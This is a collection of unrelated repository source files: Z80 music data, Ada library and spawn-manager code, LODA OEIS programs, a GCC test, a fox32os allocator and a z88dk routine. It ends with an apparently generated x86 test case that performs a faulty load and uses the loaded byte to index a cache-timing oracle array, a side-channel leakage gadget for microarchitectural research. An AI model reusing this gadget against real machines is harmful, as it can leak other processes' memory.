$28,$F0,$A5,$14,$A1,$BF,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1E defb $A0,$56,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1F defb $A0,$1D,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01 defb $1A,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$14,$A1,$3B,$28,$F1,$04,$02 defb $28,$00,$28,$01,$1A,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$04,$02,$28,$00,$28,$01,$08,$06,$A4,$1F,$A0,$1D,$28,$F0 defb $A5,$14,$A1,$3B,$28,$F1,$02,$01,$28,$00,$08,$03,$A4,$1F,$A0,$89 defb $28,$F0,$02,$01,$28,$00,$06,$03,$A4,$24,$A0,$3B,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$14 defb $A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06,$A4,$1D,$A0,$FB defb $28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06 defb $A4,$1E,$A0,$56,$28,$F0,$A5,$0E,$A1,$56,$28,$F1,$04,$01,$28,$00 defb $0D,$03,$A4,$1D,$A0,$FB,$28,$F0,$02,$01,$28,$00,$0D,$03,$A4,$1E defb $A0,$56,$28,$F0,$02,$01,$28,$00,$12,$03,$A4,$1F,$A0,$1D,$28,$F0 defb $08,$01,$28,$01,$04,$01,$28,$00,$1A,$06,$A4,$1F,$A0,$89,$28,$F0 defb $A5,$0C,$A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1F defb $A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1E,$A0,$56,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $1A,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0D,$A1,$08,$28,$F1,$04,$02 defb $28,$00,$28,$01,$0D,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1D,$A0,$08,$28,$F0,$A5,$0E defb $A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C,$A0,$BF,$28,$F0 defb $02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1D,$A0,$08,$28,$F0 defb $A5,$0C,$A1,$3B,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1D defb $A0,$08,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$08,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$17,$A0,$89,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $1A,$06,$A4,$17,$A0,$1D,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$04,$02 defb $28,$00,$28,$01,$0D,$06,$A4,$16,$A0,$56,$28,$F0,$A5,$0C,$A1,$3B defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$17,$A0,$1D,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$1A,$06,$A4,$15,$A0,$A5,$28,$F0,$A5,$05 defb $A1,$A5,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1C,$A0,$3B defb $28,$F0,$A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D defb $A1,$A5,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$15 defb $A0,$A5,$28,$F0,$A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$01,$0B,$03 defb $A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06 defb $A4,$15,$A0,$A5,$28,$F0,$A5,$0F,$A1,$1D,$28,$F1,$02,$01,$28,$01 defb $0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01 defb $0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$15,$A0,$A5,$28,$F0,$A5,$0F,$A1,$89,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$0D,$06,$A4,$15,$A0,$A5,$28,$F0,$A5,$0F,$A1,$89 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$1A,$06,$A4,$1D,$A0,$08,$28,$F0,$A5,$0F defb $A1,$1D,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1D,$A0,$A5 defb $28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1D defb $A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C defb $A0,$BF,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1D,$A0,$08,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01 defb $0D,$03,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0F defb $A1,$1D,$28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0D,$03,$A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$01 defb $03,$03,$A5,$0F,$A1,$1D,$28,$F1,$0A,$01,$28,$00,$02,$01,$28,$01 defb $0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01 defb $28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$00,$0D,$03 defb $A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00,$07,$03,$A4,$1F,$A0,$89 defb $28,$F0,$06,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B defb $28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F defb $A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1F defb $A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01,$28,$01,$0B,$03 defb $A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06 defb $A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01 defb $0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01 defb $0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1 defb $02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$00 defb $0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01,$28,$00,$07,$03,$A4,$1F defb $A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C defb $A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03 defb $A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06 defb $A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01,$28,$01 defb $0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01 defb $0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$02,$01 defb $28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $02,$01,$28,$01,$1A,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0D,$A1,$08 defb $28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06,$A4,$1D,$A0,$A5,$28,$F0 defb $A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1D,$A0,$08 defb $28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$BF defb $28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1C defb $A0,$3B,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1D defb $A0,$A5,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01 defb $0D,$06,$A4,$1D,$A0,$08,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01 defb $28,$00,$0B,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0F,$A1,$89,$28,$F1 defb $02,$01,$28,$00,$0B,$03,$A4,$17,$A0,$89,$28,$F0,$02,$01,$28,$01 defb $02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$08 defb $28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF,$28,$F0,$02,$01 defb $28,$00,$16,$03,$A4,$15,$A0,$A5,$28,$F0,$04,$01,$28,$01,$04,$01 defb $28,$00,$1A,$06,$A4,$17,$A0,$1D,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $04,$02,$28,$00,$28,$01,$1A,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0F defb $A1,$89,$28,$F1,$04,$01,$28,$01,$1A,$03,$A5,$0D,$A1,$A5,$28,$F1 defb $04,$01,$28,$01,$12,$03,$A5,$07,$A1,$89,$28,$F1,$08,$01,$28,$00 defb $04,$01,$28,$01,$00 ;; 7045 bytes in song
ada-strings-wide_fixed.ads
mgrojo/adalib
15
2372
<reponame>mgrojo/adalib -- Standard Ada library specification -- Copyright (c) 2003-2018 <NAME> <<EMAIL>> -- Copyright (c) 2004-2016 AXE Consultants -- Copyright (c) 2004, 2005, 2006 Ada-Europe -- Copyright (c) 2000 The MITRE Corporation, Inc. -- Copyright (c) 1992, 1993, 1994, 1995 Intermetrics, Inc. -- SPDX-License-Identifier: BSD-3-Clause and LicenseRef-AdaReferenceManual --------------------------------------------------------------------------- with Ada.Strings.Wide_Maps; package Ada.Strings.Wide_Fixed is pragma Preelaborate (Wide_Fixed); -- "Copy" procedure for strings of possibly different lengths procedure Move (Source : in Wide_String; Target : out Wide_String; Drop : in Truncation := Error; Justify : in Alignment := Left; Pad : in Wide_Character := Wide_Space); -- Search subprograms function Index (Source : in Wide_String; Pattern : in Wide_String; From : in Positive; Going : in Direction := Forward; Mapping : in Wide_Maps.Wide_Character_Mapping := Wide_Maps.Identity) return Natural; function Index (Source : in Wide_String; Pattern : in Wide_String; From : in Positive; Going : in Direction := Forward; Mapping : in Wide_Maps.Wide_Character_Mapping_Function) return Natural; function Index (Source : in Wide_String; Pattern : in Wide_String; Going : in Direction := Forward; Mapping : in Wide_Maps.Wide_Character_Mapping := Wide_Maps.Identity) return Natural; function Index (Source : in Wide_String; Pattern : in Wide_String; Going : in Direction := Forward; Mapping : in Wide_Maps.Wide_Character_Mapping_Function) return Natural; function Index (Source : in Wide_String; Set : in Wide_Maps.Wide_Character_Set; From : in Positive; Test : in Membership := Inside; Going : in Direction := Forward) return Natural; function Index (Source : in Wide_String; Set : in Wide_Maps.Wide_Character_Set; Test : in Membership := Inside; Going : in Direction := Forward) return Natural; function Index_Non_Blank (Source : in Wide_String; From : in Positive; Going : in Direction := Forward) return Natural; function Index_Non_Blank (Source : in Wide_String; Going : in Direction := Forward) return Natural; function Count (Source : in Wide_String; Pattern : in Wide_String; Mapping : in Wide_Maps.Wide_Character_Mapping := Wide_Maps.Identity) return Natural; function Count (Source : in Wide_String; Pattern : in Wide_String; Mapping : in Wide_Maps.Wide_Character_Mapping_Function) return Natural; function Count (Source : in Wide_String; Set : in Wide_Maps.Wide_Character_Set) return Natural; procedure Find_Token (Source : in Wide_String; Set : in Wide_Maps.Wide_Character_Set; Test : in Membership; First : out Positive; Last : out Natural); -- Wide_String translation subprograms function Translate (Source : in Wide_String; Mapping : in Wide_Maps.Wide_Character_Mapping) return Wide_String; procedure Translate (Source : in out Wide_String; Mapping : in Wide_Maps.Wide_Character_Mapping); function Translate (Source : in Wide_String; Mapping : in Wide_Maps.Wide_Character_Mapping_Function) return Wide_String; procedure Translate (Source : in out Wide_String; Mapping : in Wide_Maps.Wide_Character_Mapping_Function); -- Wide_String transformation subprograms function Replace_Slice (Source : in Wide_String; Low : in Positive; High : in Natural; By : in Wide_String) return Wide_String; procedure Replace_Slice (Source : in out Wide_String; Low : in Positive; High : in Natural; By : in Wide_String; Drop : in Truncation := Error; Justify : in Alignment := Left; Pad : in Wide_Character := Wide_Space); function Insert (Source : in Wide_String; Before : in Positive; New_Item : in Wide_String) return Wide_String; procedure Insert (Source : in out Wide_String; Before : in Positive; New_Item : in Wide_String; Drop : in Truncation := Error); function Overwrite (Source : in Wide_String; Position : in Positive; New_Item : in Wide_String) return Wide_String; procedure Overwrite (Source : in out Wide_String; Position : in Positive; New_Item : in Wide_String; Drop : in Truncation := Right); function Delete (Source : in Wide_String; From : in Positive; Through : in Natural) return Wide_String; procedure Delete (Source : in out Wide_String; From : in Positive; Through : in Natural; Justify : in Alignment := Left; Pad : in Wide_Character := Wide_Space); -- Wide_String selector subprograms function Trim (Source : in Wide_String; Side : in Trim_End) return Wide_String; procedure Trim (Source : in out Wide_String; Side : in Trim_End; Justify : in Alignment := Left; Pad : in Wide_Character := Wide_Space); function Trim (Source : in Wide_String; Left : in Wide_Maps.Wide_Character_Set; Right : in Wide_Maps.Wide_Character_Set) return Wide_String; procedure Trim (Source : in out Wide_String; Left : in Wide_Maps.Wide_Character_Set; Right : in Wide_Maps.Wide_Character_Set; Justify : in Alignment := Strings.Left; Pad : in Wide_Character := Wide_Space); function Head (Source : in Wide_String; Count : in Natural; Pad : in Wide_Character := Wide_Space) return Wide_String; procedure Head (Source : in out Wide_String; Count : in Natural; Justify : in Alignment := Left; Pad : in Wide_Character := Wide_Space); function Tail (Source : in Wide_String; Count : in Natural; Pad : in Wide_Character := Wide_Space) return Wide_String; procedure Tail (Source : in out Wide_String; Count : in Natural; Justify : in Alignment := Left; Pad : in Wide_Character := Wide_Space); -- Wide_String constructor functions function "*" (Left : in Natural; Right : in Wide_Character) return Wide_String; function "*" (Left : in Natural; Right : in Wide_String) return Wide_String; end Ada.Strings.Wide_Fixed;
parsers-multiline_source-text_io.ads
jrcarter/Ada_GUI
19
26280
<reponame>jrcarter/Ada_GUI -- -- -- package Copyright (c) <NAME> -- -- Parsers.Multiline_Source.Text_IO Luebeck -- -- Interface Winter, 2004 -- -- -- -- Last revision : 09:24 09 Apr 2010 -- -- -- -- This library is free software; you can redistribute it and/or -- -- modify it under the terms of the GNU General Public License as -- -- published by the Free Software Foundation; either version 2 of -- -- the License, or (at your option) any later version. This library -- -- is distributed in the hope that it will be useful, but WITHOUT -- -- ANY WARRANTY; without even the implied warranty of -- -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -- -- General Public License for more details. You should have -- -- received a copy of the GNU General Public License along with -- -- this library; if not, write to the Free Software Foundation, -- -- Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. -- -- -- -- As a special exception, if other files instantiate generics from -- -- this unit, or you link this unit with other files to produce an -- -- executable, this unit does not by itself cause the resulting -- -- executable to be covered by the GNU General Public License. This -- -- exception does not however invalidate any other reasons why the -- -- executable file might be covered by the GNU Public License. -- --____________________________________________________________________-- -- -- This package provides an implementation of code sources based on -- the standard text I/O package. -- with Ada.Text_IO; use Ada.Text_IO; package Parsers.Multiline_Source.Text_IO is -- -- Source -- The source contained by a file -- type Source (File : access File_Type) is new Multiline_Source.Source with private; -- -- Get_Line -- Overrides Parsers.Multiline_Source... -- procedure Get_Line (Code : in out Source); private type Source (File : access File_Type) is new Multiline_Source.Source with null record; end Parsers.Multiline_Source.Text_IO;
oeis/062/A062262.asm
neoneye/loda-programs
11
244128
; A062262: Fifth (unsigned) column sequence of triangle A062140 (generalized a=4 Laguerre). ; Submitted by <NAME> ; 1,45,1350,34650,831600,19459440,454053600,10702692000,256864608000,6307453152000,158947819430400,4118193503424000,109818493424640000,3015784780968960000,85303626661693440000,2485178990077335552000,74555369702320066560000,2302445240806943232000000,73166593207865084928000000,2391392335899169354752000000,80350782486212090319667200000,2774015109643036451512320000000,98351444796434928735436800000000,3579137360635479797893939200000000,133621128130391245788040396800000000 mov $1,$0 add $0,8 bin $0,$1 add $1,4 lpb $1 mul $0,$1 sub $1,1 lpe div $0,24
oeis/204/A204675.asm
neoneye/loda-programs
11
85775
<filename>oeis/204/A204675.asm ; A204675: a(n) = 16*n^2 + 2*n + 1. ; 1,19,69,151,265,411,589,799,1041,1315,1621,1959,2329,2731,3165,3631,4129,4659,5221,5815,6441,7099,7789,8511,9265,10051,10869,11719,12601,13515,14461,15439,16449,17491,18565,19671,20809,21979,23181,24415,25681,26979,28309,29671,31065,32491,33949,35439,36961,38515,40101,41719,43369,45051,46765,48511,50289,52099,53941,55815,57721,59659,61629,63631,65665,67731,69829,71959,74121,76315,78541,80799,83089,85411,87765,90151,92569,95019,97501,100015,102561,105139,107749,110391,113065,115771,118509,121279 mov $1,16 mul $1,$0 add $1,2 mul $1,$0 add $1,1 mov $0,$1
gcc-gcc-7_3_0-release/gcc/testsuite/gnat.dg/lto9_pkg1.ads
best08618/asylo
7
23180
with Lto9_Pkg2; package Lto9_Pkg1 is subtype Lengths is Natural range 0 .. 50; type Subscriber (NLen, ALen: Lengths := 50) is record Name : String(1 .. NLen); Address : String(1 .. ALen); end record; type Subscriber_Ptr is access all Subscriber; package District_Subscription_Lists is new Lto9_Pkg2 (Element_Type => Subscriber, Element_Ptr => Subscriber_Ptr, Size => 100); District_01_Subscribers : District_Subscription_Lists.List_Type; New_Subscriber_01 : aliased Subscriber := (12, 23, "<NAME>", "King's Pyland, Dartmoor"); end Lto9_Pkg1;
fox32os/kernel/allocator.asm
ry755/fox32
6
178442
; memory allocator routines ; this is a very basic memory allocator, it doesn't even allow freeing ; TODO: make this better const MEMORY_TOP: 0x02000000 ; allocate a block of memory ; inputs: ; r0: size in bytes ; outputs: ; r0: pointer to allocated block (or zero if no blocks free) allocate_memory: push r1 push r2 mov r1, MEMORY_TOP mov r2, [free_base] sub r1, r2 cmp r1, r0 iflteq jmp allocate_memory_full mov r1, [free_base] add [free_base], r0 mov r0, r1 pop r2 pop r1 ret allocate_memory_full: mov r0, 0 pop r2 pop r1 ret free_base: data.32 kernel_bottom
libsrc/input/spectrum/in_GetKeyReset.asm
meesokim/z88dk
0
21937
<reponame>meesokim/z88dk ; void in_GetKeyReset(void) ; 09.2005 aralbrec PUBLIC in_GetKeyReset EXTERN _in_KeyDebounce, _in_KbdState .in_GetKeyReset ld a,(_in_KeyDebounce) ld e,a ld d,0 ld (_in_KbdState),de ret
programs/oeis/059/A059997.asm
karttu/loda
0
175575
; A059997: a(n) = (n/2)*(n + 1)*(3*n + 11). ; 14,51,120,230,390,609,896,1260,1710,2255,2904,3666,4550,5565,6720,8024,9486,11115,12920,14910,17094,19481,22080,24900,27950,31239,34776,38570,42630,46965,51584,56496,61710,67235,73080,79254,85766,92625,99840,107420,115374,123711,132440,141570,151110,161069,171456,182280,193550,205275,217464,230126,243270,256905,271040,285684,300846,316535,332760,349530,366854,384741,403200,422240,441870,462099,482936,504390,526470,549185,572544,596556,621230,646575,672600,699314,726726,754845,783680,813240,843534,874571,906360,938910,972230,1006329,1041216,1076900,1113390,1150695,1188824,1227786,1267590,1308245,1349760,1392144,1435406,1479555,1524600,1570550,1617414,1665201,1713920,1763580,1814190,1865759,1918296,1971810,2026310,2081805,2138304,2195816,2254350,2313915,2374520,2436174,2498886,2562665,2627520,2693460,2760494,2828631,2897880,2968250,3039750,3112389,3186176,3261120,3337230,3414515,3492984,3572646,3653510,3735585,3818880,3903404,3989166,4076175,4164440,4253970,4344774,4436861,4530240,4624920,4720910,4818219,4916856,5016830,5118150,5220825,5324864,5430276,5537070,5645255,5754840,5865834,5978246,6092085,6207360,6324080,6442254,6561891,6683000,6805590,6929670,7055249,7182336,7310940,7441070,7572735,7705944,7840706,7977030,8114925,8254400,8395464,8538126,8682395,8828280,8975790,9124934,9275721,9428160,9582260,9738030,9895479,10054616,10215450,10377990,10542245,10708224,10875936,11045390,11216595,11389560,11564294,11740806,11919105,12099200,12281100,12464814,12650351,12837720,13026930,13217990,13410909,13605696,13802360,14000910,14201355,14403704,14607966,14814150,15022265,15232320,15444324,15658286,15874215,16092120,16312010,16533894,16757781,16983680,17211600,17441550,17673539,17907576,18143670,18381830,18622065,18864384,19108796,19355310,19603935,19854680,20107554,20362566,20619725,20879040,21140520,21404174,21670011,21938040,22208270,22480710,22755369,23032256,23311380,23592750,23876375 add $0,1 mov $2,5 lpb $0,1 sub $0,1 add $2,9 add $3,$2 add $1,$3 lpe
src/spawn_manager-server-main.adb
persan/spawn-manager
1
8572
<reponame>persan/spawn-manager<filename>src/spawn_manager-server-main.adb with GNAT.Sockets; use GNAT.Sockets; with Ada.Command_Line; with GNAT.Exception_Traces; with GNAT.Traceback.Symbolic; procedure Spawn_Manager.Server.Main is Address : Sock_Addr_Type; Server : Socket_Type; Channel : Stream_Access; Id : Long_Integer; Request : Spawn_Request; Response : Spawn_Response; begin GNAT.Exception_Traces.Set_Trace_Decorator (GNAT.Traceback.Symbolic.Symbolic_Traceback'Access); GNAT.Exception_Traces.Trace_On (GNAT.Exception_Traces.Every_Raise); Address.Addr := Inet_Addr (Ada.Command_Line.Argument (1)); Address.Port := Port_Type'Value (Ada.Command_Line.Argument (2)); Id := Long_Integer'Value (Ada.Command_Line.Argument (3)); Create_Socket (Server); Connect_Socket (Server, Address); Channel := Stream (Server); loop Spawn_Request'Read (Channel, Request); exit when Is_Exit_Message (Request); if Request.Id /= Id then Response := (False, -1, Invalid_Pid, To_Unbounded_String ("Invalid id from client")); Spawn_Response'Write (Channel, Response); Close_Socket (Server); raise Program_Error with "Invalid id from client"; elsif Request.Version /= Version then Response := (False, -1, Invalid_Pid, To_Unbounded_String ("Server and client versions missmatch Server:") & Version & ", Client:" & Request.Version); Spawn_Response'Write (Channel, Response); Close_Socket (Server); raise Program_Error with "Server and client versions missmatch Server:" & Version & ", Client:" & To_String (Request.Version); else Response := Spawn (Request); Spawn_Response'Write (Channel, Response); end if; end loop; Close_Socket (Server); end Spawn_Manager.Server.Main;
examples/direct/test_li.asm
hughperkins/toy_proc
4
247316
<reponame>hughperkins/toy_proc # test li with different registers, using outr # also test outr li x1 3 outr x1 li x1 27 outr x1 li x1 123 outr x1 li x1 444 outr x1 li x21 222 li x23 333 outr x21 outr x23 li x1 7 li x2 35 outr x1 outr x2 li x2 22 li x1 47 outr x1 outr x2 outr x1 outr x2 halt
Transynther/x86/_processed/NONE/_zr_/i3-7100_9_0x84_notsx.log_21829_305.asm
ljhsiun2/medusa
9
22262
.global s_prepare_buffers s_prepare_buffers: ret .global s_faulty_load s_faulty_load: push %r11 push %r13 push %r14 push %r9 push %rbx push %rdi push %rsi // Store lea addresses_normal+0x116a6, %r13 clflush (%r13) nop dec %rbx movb $0x51, (%r13) nop nop nop dec %rsi // Load mov $0xd29, %rdi nop nop nop nop and $15799, %r13 mov (%rdi), %r14 nop nop cmp %rdi, %rdi // Load lea addresses_A+0x14de9, %r9 nop nop nop nop nop add %r11, %r11 mov (%r9), %r14d nop nop add %r9, %r9 // Load lea addresses_WT+0x15719, %r13 nop nop nop nop nop add %rdi, %rdi movb (%r13), %r9b nop nop nop nop xor $18141, %r14 // Load lea addresses_A+0x1fce9, %r14 nop nop nop nop dec %rdi mov (%r14), %esi nop nop nop nop nop xor %r11, %r11 // Store lea addresses_normal+0x169ed, %r11 nop sub %rbx, %rbx mov $0x5152535455565758, %r13 movq %r13, (%r11) dec %rsi // Faulty Load lea addresses_A+0x14de9, %r13 nop sub $38986, %r11 movb (%r13), %r9b lea oracles, %r14 and $0xff, %r9 shlq $12, %r9 mov (%r14,%r9,1), %r9 pop %rsi pop %rdi pop %rbx pop %r9 pop %r14 pop %r13 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_A', 'same': False, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_normal', 'same': False, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_P', 'same': False, 'size': 8, 'congruent': 6, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_A', 'same': True, 'size': 4, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT', 'same': False, 'size': 1, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_A', 'same': False, 'size': 4, 'congruent': 8, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_normal', 'same': False, 'size': 8, 'congruent': 1, 'NT': False, 'AVXalign': True}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_A', 'same': True, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 